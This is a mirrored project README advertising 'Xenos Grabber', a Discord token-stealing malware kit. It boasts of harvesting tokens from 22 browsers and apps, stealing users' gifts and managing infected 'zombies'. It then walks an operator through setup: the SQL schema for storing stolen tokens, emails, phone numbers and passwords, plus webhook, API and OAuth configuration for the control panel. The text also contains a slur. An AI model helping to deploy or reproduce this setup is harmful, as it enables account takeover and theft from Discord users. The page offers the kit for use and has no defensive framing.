Giter Club home page Giter Club logo

xenos's Introduction

๐Ÿบ Xenos Grabber ๐Ÿบ

The most powerfull Discord Token Grabber

Join my Discord Serveur




Features

  • Infinite Discord Webhook (Can't delete it)
  • Use and view your zombies on the panel
  • Use our api for manager your zombies
  • Xenos uses the discord login system as well as a whitelist of ids
  • Our grabber get the tokens on 22 Applications/Browsers
  • Recover the account information even if the person changes the password
  • Steal all the gifts that the user has
  • Detect Flagged/Working Tokens

How to use Xenos

  • If you're gay you can follow step by step this tutorial: https://youtube.com/
  • Else follow Step by Step that:
    • You need a website to host the files (you can use 000webhost)
    • In the phpmyadmin of your website, create a database, then click on it and select above the SQL category, once all that done paste the code below and click on execute.
CREATE TABLE `gifts` (
  `id` int(11) NOT NULL,
  `gift_name` varchar(100) NOT NULL,
  `start_date` varchar(100) NOT NULL,
  `end_date` varchar(100) NOT NULL,
  `code` varchar(100) NOT NULL,
  `claim_at` varchar(100) NOT NULL,
  `steal_date` datetime NOT NULL DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

CREATE TABLE `tokens` (
  `user_id` text NOT NULL,
  `username` text NOT NULL,
  `avatar` text NOT NULL,
  `email` text NOT NULL,
  `phone` text NOT NULL,
  `badges` int(10) NOT NULL,
  `nitro_badges` int(10) NOT NULL,
  `twofactor` varchar(100) NOT NULL,
  `token` text NOT NULL,
  `isflaged` int(10) NOT NULL,
  `password` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

ALTER TABLE `gifts`
  ADD PRIMARY KEY (`id`);

ALTER TABLE `gifts`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;
COMMIT;
    • Then go to Inc/database.php and put your hostname, database, username, password
    • Open Inc/fonctions.php and put:
      • At line 5 replace PASSWORD FOR API by a password for using our api and remove a token
      • At line 6 replace YOUR DISCORD WEBHOOK by your webhook for receive notifications when your infect a user
      • At line 9 & 10 Go to https://discord.com/developers then create an applcation
      • In Click on your application in Oauth2 Section Copy the Client ID and Client Secret
      • At line 11 replace yoursite.com by your website url and on https://discord.com/developers on your application in oauth section create a redirect and paste http://yoursite.com/async/login (with your website please your are not stupid)
      • For end just add your id at the line 12, for each id separated by ,
        (exemple: array("922450497074495539", "957329295603269652"))
  • Put a stars and follow me for more โค๏ธ

Grabber Demo:

Connection Notification Demo:

Home Page Demo:

Contribution Welcome License Badge Open Source Visitor Count

xenos's People

Contributors

kanekiweb avatar kliamp avatar vedal0 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.